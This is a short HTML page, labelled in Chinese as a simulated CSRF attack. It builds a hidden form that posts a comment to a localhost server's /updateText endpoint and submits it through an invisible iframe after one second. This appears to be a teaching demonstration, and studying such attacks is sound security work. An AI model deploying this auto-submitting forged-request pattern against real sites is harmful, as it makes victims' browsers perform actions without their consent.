<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    
</head>
<body>
    CSRF模拟攻击
    <script>
        document.write(`
        <form name="form" action="http://localhost:3000/updateText" method="post" target="csrf">
        添加评论：<input type="text" name="text" value="我是CSRF攻击" />
        </form>
        `)
        var iframe = document.createElement('iframe')
        iframe.name = 'csrf'
        iframe.style.display = 'none'
        document.body.appendChild(iframe)
        setTimeout(function() {
            document.querySelector('form').submit()
        },1000)

    </script>
</body>
</html>
